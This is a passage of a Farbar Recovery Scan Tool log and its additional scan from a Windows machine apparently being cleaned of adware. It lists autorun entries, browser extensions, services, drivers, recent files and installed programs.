(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-21] (Microsoft Corporation)
HKLM\...\Run: [LManager] => C:\Program Files\Launch Manager\LManager.exe [768520 2008-07-25] (Dritek System Inc.)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [159744 2007-07-21] (Alps Electric Co., Ltd.)
HKLM\...\Run: [WarReg_PopUp] => C:\Program Files\eMachines\WR_PopUp\WarReg_PopUp.exe [49152 2008-05-09] (eMachines)
HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [974432 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [MailCheck IE Broker] => C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe [2135104 2014-11-17] (1und1 Mail und Media GmbH)
HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-21] (Microsoft Corporation)
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: F - F:\LaunchU3.exe -a
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: I - I:\LaunchU3.exe -a

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://suche.web.de/webhp?src=br_startpage_ie
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
SearchScopes: HKLM -> {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACEW
SearchScopes: HKU\.DEFAULT -> {31BB071C-45F4-4DAD-BF5E-AD495B3B2FC8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin
SearchScopes: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> DefaultScope {0DE76405-1CA2-4197-98FF-E6340A0B93E8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin
SearchScopes: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> {0DE76405-1CA2-4197-98FF-E6340A0B93E8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files\Windows Live\Companion\companioncore.dll (Microsoft Corporation)
BHO: WEB.DE MailCheck BHO -> {BF42D4A8-016E-4fcd-B1EB-837659FD77C6} -> C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck.dll (1und1 Mail und Media GmbH)
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll (Microsoft Corporation)
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - c:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll (Microsoft Corporation)
Handler: webde - {8FAF0273-9CA8-4efc-9536-1E35E254D5CD} - C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck.dll (1und1 Mail und Media GmbH)
Tcpip\Parameters: [DhcpNameServer] 192.168.179.1

FireFox:
========
FF ProfilePath: C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_189.dll ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-717213786-2690546565-922636609-1000: @lightspark.github.com/Lightspark;version=1 -> C:\Program Files\Lightspark 0.5.3-git\nplightsparkplugin.dll No File
FF SearchPlugin: C:\Program Files\mozilla firefox\searchplugins\webssearches.xml
FF Extension: 06997db0c0274d5fbd37b0d9230226ea - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{06997db0-c027-4d5f-bd37-b0d9230226ea} [2014-11-06]
FF Extension: Microsoft .NET Framework Assistant - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b}.xpi [2014-11-04]
FF Extension: PriceFountain - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{b6a94784-0ffb-4121-88c6-435139067ee2}.xpi [2014-11-06]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-16]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\tylerkeith11@aol.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\{9015bae7-cdbb-4473-a5d0-ecfa559b2ca5}.xpi [Not Found]
FF Extension: No Name - C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [Not Found]
FF Extension: No Name - {9015bae7-cdbb-4473-a5d0-ecfa559b2ca5} [Not Found]
FF Extension: No Name - 1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found]
FF Extension: No Name - 3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found]
FF Extension: No Name - tylerkeith11@aol.com [Not Found]
FF Extension: No Name - ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found]
FF StartMenuInternet: FIREFOX.EXE - firefox.exe

Chrome: 
=======
CHR StartMenuInternet: Google Chrome - chrome.exe

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 ETService; C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe [24576 2008-06-11] () [File not signed]
R2 LightScribeService; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [61440 2007-01-17] (Hewlett-Packard Company) [File not signed]
R2 MBAMScheduler; C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-11-21] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [969016 2014-11-21] (Malwarebytes Corporation)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22192 2014-08-22] (Microsoft Corporation)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2009-05-14] (Hewlett-Packard) [File not signed]
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [288120 2014-08-22] (Microsoft Corporation)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2009-05-14] (Hewlett-Packard) [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 DritekPortIO; C:\Program Files\Launch Manager\DPortIO.sys [20112 2006-11-02] (Dritek System Inc.)
S3 grmnusb; C:\Windows\System32\drivers\grmnusb.sys [15720 2012-04-18] (GARMIN Corp.)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [35992 2014-12-05] ()
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [23256 2014-11-21] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [51928 2014-11-21] (Malwarebytes Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [231800 2014-07-17] (Microsoft Corporation)
S3 USB_RNDIS; C:\Windows\System32\DRIVERS\usb8023.sys [15872 2013-02-12] (Microsoft Corporation)
S3 BS2521310881; \??\C:\Users\finja\AppData\Local\Temp\NTFS.sys [X]
S3 IntcAzAudAddService; system32\drivers\RTKVHDA.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-12-06 17:35 - 2014-12-06 17:35 - 00000000 ____D () C:\Users\finja\Desktop\FRST-OlderVersion
2014-12-06 16:21 - 2014-12-06 16:21 - 00000634 _____ () C:\Users\finja\Desktop\JRT.txt
2014-12-06 15:41 - 2014-12-06 15:41 - 00001257 _____ () C:\Users\finja\Desktop\AdwCleaner[S3].txt
2014-12-06 15:36 - 2014-12-06 15:36 - 01707646 _____ (Thisisu) C:\Users\finja\Desktop\JRT.exe
2014-12-06 15:35 - 2014-12-06 15:35 - 02153472 _____ () C:\Users\finja\Desktop\AdwCleaner_4.104.exe
2014-12-06 10:28 - 2014-12-06 16:14 - 00001435 _____ () C:\Users\finja\Desktop\mbam.txt
2014-12-06 10:23 - 2014-12-06 10:24 - 00018716 _____ () C:\Users\finja\Desktop\gmer.txt
2014-12-06 09:22 - 2014-12-06 16:32 - 00023867 _____ () C:\Users\finja\Desktop\Addition.txt
2014-12-06 09:22 - 2014-12-06 09:22 - 00380416 _____ () C:\Users\finja\Desktop\v5shw8ku.exe
2014-12-06 09:20 - 2014-12-06 17:45 - 00013197 _____ () C:\Users\finja\Desktop\FRST.txt
2014-12-06 09:20 - 2014-12-06 17:43 - 00000000 ____D () C:\FRST
2014-12-06 09:19 - 2014-12-06 17:35 - 01111040 _____ (Farbar) C:\Users\finja\Desktop\FRST.exe
2014-12-06 09:18 - 2014-12-06 09:18 - 00000472 _____ () C:\Users\finja\Desktop\defogger_disable.log
2014-12-06 09:18 - 2014-12-06 09:18 - 00000000 _____ () C:\Users\finja\defogger_reenable
2014-12-06 09:17 - 2014-12-06 09:17 - 00050477 _____ () C:\Users\finja\Desktop\Defogger.exe
2014-12-06 08:40 - 2014-12-06 08:50 - 00003570 _____ () C:\Users\finja\Desktop\Rkill.txt
2014-12-06 08:39 - 2014-12-06 08:39 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\finja\Downloads\rkill.exe
2014-12-05 21:51 - 2014-12-06 17:42 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-12-05 21:51 - 2014-12-05 21:53 - 00000901 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-12-05 21:50 - 2014-12-05 21:53 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 
2014-12-05 21:50 - 2014-12-05 21:53 - 00000000 ____D () C:\Program Files\ Malwarebytes Anti-Malware 
2014-12-05 21:50 - 2014-11-21 06:14 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-12-05 21:50 - 2014-11-21 06:14 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-12-05 21:50 - 2014-11-21 06:14 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-12-05 21:07 - 2014-12-06 15:35 - 00000110 _____ () C:\AdwCleanerDebug.txt
2014-12-05 21:04 - 2014-12-05 21:04 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-12-05 20:49 - 2014-12-05 20:49 - 00035992 _____ () C:\Windows\system32\Drivers\hitmanpro37.sys
2014-12-05 20:32 - 2014-12-05 20:32 - 00011842 _____ () C:\Windows\system32\.crusader
2014-12-05 20:01 - 2014-12-05 20:32 - 00000000 ____D () C:\Users\finja\AppData\Local\gnuutilityUI
2014-12-05 20:01 - 2014-12-05 20:02 - 00000000 ____D () C:\Windows\system32\guicca32
2014-12-05 19:40 - 2014-12-05 19:40 - 263670483 _____ () C:\Windows\MEMORY.DMP
2014-12-05 19:40 - 2014-12-05 19:40 - 00145784 _____ () C:\Windows\Minidump\Mini120514-01.dmp
2014-12-05 19:39 - 2014-12-05 19:39 - 00000000 ____D () C:\Temp
2014-12-05 13:33 - 2014-12-05 20:08 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-12-04 20:43 - 2014-12-04 20:43 - 00000000 ____D () C:\Users\finja\AppData\Local\Microsoft Corporation
2014-11-29 20:02 - 2014-11-29 20:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WEB.DE MailCheck
2014-11-29 20:02 - 2014-11-29 20:02 - 00000000 ____D () C:\Program Files\WEB.DE MailCheck
2014-11-27 22:42 - 2014-11-27 22:42 - 00000000 ____D () C:\Program Files\Microsoft ATS
2014-11-27 22:33 - 2014-11-27 22:33 - 11473216 _____ (Microsoft Corporation) C:\Users\finja\Downloads\mseinstall (1).exe
2014-11-27 22:31 - 2014-11-27 22:31 - 11473216 _____ (Microsoft Corporation) C:\Users\finja\Downloads\mseinstall.exe
2014-11-27 22:23 - 2014-11-27 22:23 - 00001998 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows 7 Upgrade Advisor.lnk
2014-11-27 22:23 - 2014-11-27 22:23 - 00001986 _____ () C:\Users\Public\Desktop\Windows 7 Upgrade Advisor.lnk
2014-11-27 22:23 - 2014-11-27 22:23 - 00000000 ____D () C:\Program Files\Microsoft Windows 7 Upgrade Advisor
2014-11-27 21:25 - 2014-11-27 21:25 - 00000000 ____D () C:\Windows\system32\DesktopMBRText
2014-11-25 15:33 - 2014-12-05 20:32 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-11-19 21:31 - 2014-10-24 02:03 - 00499200 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-11-13 14:27 - 2014-11-13 14:27 - 00000951 _____ () C:\Users\finja\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-11-13 13:30 - 2014-11-13 13:30 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-11-13 13:25 - 2014-11-13 13:25 - 00000000 ____D () C:\Windows\ERUNT
2014-11-13 13:15 - 2014-12-06 15:37 - 00000000 ____D () C:\AdwCleaner
2014-11-13 12:54 - 2014-12-05 13:56 - 00001356 _____ () C:\Users\finja\AppData\Local\d3d9caps.dat
2014-11-12 23:01 - 2014-10-10 02:01 - 00449536 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-11-12 23:01 - 2014-10-10 02:00 - 01259008 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-11-12 23:01 - 2014-10-10 02:00 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2014-11-12 23:01 - 2014-10-10 00:22 - 00619520 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2014-11-12 22:59 - 2014-09-19 01:50 - 00278528 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2014-11-12 22:59 - 2014-08-27 01:55 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2014-11-12 22:59 - 2014-08-27 01:55 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll
2014-11-12 22:56 - 2014-08-12 03:25 - 00729600 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10K.DLL
2014-11-12 22:53 - 2014-10-18 02:08 - 00564224 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2014-11-12 22:53 - 2014-10-03 02:18 - 00274432 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-11-12 22:53 - 2014-10-03 02:17 - 00396800 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-11-12 22:53 - 2014-10-03 02:17 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-11-12 22:53 - 2014-10-03 02:17 - 00170496 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-11-12 07:47 - 2014-10-24 02:04 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-11-12 07:45 - 2014-10-13 00:34 - 02054656 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-11-11 22:20 - 2014-10-27 20:10 - 12366848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-11-11 22:20 - 2014-10-27 20:05 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-11-11 22:20 - 2014-10-27 20:02 - 09739776 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-11-11 22:20 - 2014-10-27 19:59 - 01139712 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-11-11 22:20 - 2014-10-27 19:59 - 01129472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-11-11 22:20 - 2014-10-27 19:58 - 01427968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-11-11 22:20 - 2014-10-27 19:57 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-11-11 22:20 - 2014-10-27 19:57 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-11-11 22:20 - 2014-10-27 19:56 - 01802752 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-11-11 22:20 - 2014-10-27 19:56 - 00717824 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-11-11 22:20 - 2014-10-27 19:56 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-11-11 22:20 - 2014-10-27 19:56 - 00421376 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-11-11 22:20 - 2014-10-27 19:56 - 00142848 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-11-11 22:20 - 2014-10-27 19:55 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-11-11 22:20 - 2014-10-27 19:55 - 00353792 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-11-11 22:20 - 2014-10-27 19:55 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-11-11 22:20 - 2014-10-27 19:55 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-11-11 22:20 - 2014-10-27 19:55 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-11-11 22:20 - 2014-10-27 19:55 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-11-11 22:20 - 2014-10-27 19:55 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-11-11 22:20 - 2014-10-27 19:54 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-11-11 08:42 - 2014-11-11 08:42 - 00000000 ____D () C:\Users\finja\AppData\Roaming\AdvancedSystemProtector
2014-11-11 08:33 - 2014-11-11 08:36 - 01057112 _____ (Installer Setup ) C:\Users\finja\Downloads\installer_java_German.exe
2014-11-10 21:27 - 2014-12-05 19:40 - 00000000 ____D () C:\Windows\Minidump
2014-11-08 21:59 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\7bb6df21-8ca8-4eec-965d-8cd2261544c7
2014-11-06 21:02 - 2014-11-06 21:02 - 00000000 ____D () C:\Users\finja\AppData\Local\Macromedia
2014-11-06 20:47 - 2014-11-13 12:44 - 00000000 ____D () C:\ProgramData\boost_interprocess
2014-11-06 20:30 - 2014-11-06 20:30 - 00000003 _____ () C:\Users\finja\Downloads\C

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-12-06 17:42 - 2014-10-05 12:36 - 00000008 __RSH () C:\ProgramData\ntuser.pol
2014-12-06 17:41 - 2009-02-27 10:20 - 00000000 _____ () C:\Windows\system32\LogConfigTemp.xml
2014-12-06 17:40 - 2014-06-08 13:02 - 00140754 _____ () C:\Windows\PFRO.log
2014-12-06 17:40 - 2006-11-02 14:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-12-06 17:40 - 2006-11-02 13:47 - 00003216 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-12-06 17:40 - 2006-11-02 13:47 - 00003216 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-12-06 17:39 - 2009-02-27 09:31 - 01209597 _____ () C:\Windows\WindowsUpdate.log
2014-12-06 17:39 - 2006-11-02 14:01 - 00032560 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-12-06 17:36 - 2009-05-16 15:26 - 00000000 ____D () C:\Users\finja
2014-12-06 17:35 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\system32\GroupPolicy
2014-12-06 16:09 - 2013-11-26 19:43 - 00000000 ____D () C:\Windows\TempDF28D6CC-3D1E-B803-1F4F-B4B1FD7BEC31-Signatures
2014-12-06 15:38 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\PLA
2014-12-05 22:17 - 2014-10-28 11:28 - 00000000 ____D () C:\ProgramData\83b32e09-56dd-4d15-bbc7-350e8627ec65
2014-12-05 21:41 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\system32\LogFiles
2014-12-05 20:49 - 2014-11-02 19:50 - 00000000 ____D () C:\Windows\system32\JREMetafilePublic
2014-12-05 13:34 - 2008-01-21 08:16 - 01598580 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-28 20:51 - 2011-04-11 19:26 - 00000000 ____D () C:\Program Files\1und1Softwareaktualisierung
2014-11-26 18:48 - 2009-05-16 15:28 - 00000000 ____D () C:\Users\finja\AppData\Roaming\Macromedia
2014-11-26 18:28 - 2008-08-15 00:15 - 00000000 ____D () C:\ProgramData\Adobe
2014-11-13 14:30 - 2014-11-04 07:52 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-11-13 14:29 - 2008-08-15 00:11 - 00000000 ____D () C:\Program Files\Google
2014-11-13 14:27 - 2009-05-16 15:28 - 00000000 ____D () C:\Users\finja\AppData\Local\Google
2014-11-13 14:25 - 2014-11-04 07:59 - 00000000 ____D () C:\Program Files\F978377C-B7D4-4536-8E10-14CA97B13394
2014-11-13 13:55 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\rescache
2014-11-13 13:46 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-11-13 13:18 - 2011-04-11 19:27 - 00000885 _____ () C:\Users\finja\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WEB.DE.lnk
2014-11-12 23:04 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\system32\de-DE
2014-11-12 23:01 - 2008-08-15 00:16 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-11-12 22:52 - 2013-08-02 19:19 - 00000000 ____D () C:\Windows\system32\MRT
2014-11-12 22:47 - 2014-06-04 20:19 - 00000106 _____ () C:\Users\finja\AppData\Roaming\WB.CFG
2014-11-12 22:39 - 2006-11-02 11:24 - 100445232 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2014-11-12 22:27 - 2006-11-02 11:23 - 00000321 _____ () C:\Windows\win.ini
2014-11-12 14:45 - 2006-11-02 13:47 - 00393944 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-11-08 21:15 - 2014-11-02 19:57 - 00000000 ___HD () C:\Users\Public\Temp
2014-11-06 20:56 - 2014-11-02 19:50 - 00000000 ____D () C:\Program Files\Free Flash Plugin
2014-11-06 20:49 - 2012-08-10 17:12 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-11-06 20:49 - 2011-12-26 19:46 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-11-06 20:49 - 2009-05-16 16:07 - 00000000 ____D () C:\Users\finja\AppData\Local\Adobe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-12-06 16:22

==================== End Of Log ============================

Addition:
Code:
ATTFilter
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 06-12-2014 02
Ran by finja at 2014-12-06 17:45:42
Running from C:\Users\finja\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

32 Bit HP CIO Components Installer (Version: 6.1.2 - Hewlett-Packard) Hidden
Activation Assistant for the 2007 Microsoft Office suites (HKLM\...\Activation Assistant for the 2007 Microsoft Office suites) (Version:  - Microsoft Corporation)
Activation Assistant for the 2007 Microsoft Office suites (Version: 1.0 - Microsoft Corporation) Hidden
Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.3.0.3650 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Adobe Reader X (10.1.12) - Deutsch (HKLM\...\{AC76BA86-7AD7-1031-7B44-AA1000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: Version 7.0.1101.18 - Alps Electric)
Bookworm Deluxe (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110113233}) (Version:  - Oberon Media)
Bricks of Egypt (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11029123}) (Version:  - Oberon Media)
Build-a-lot (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113537610}) (Version:  - Oberon Media)
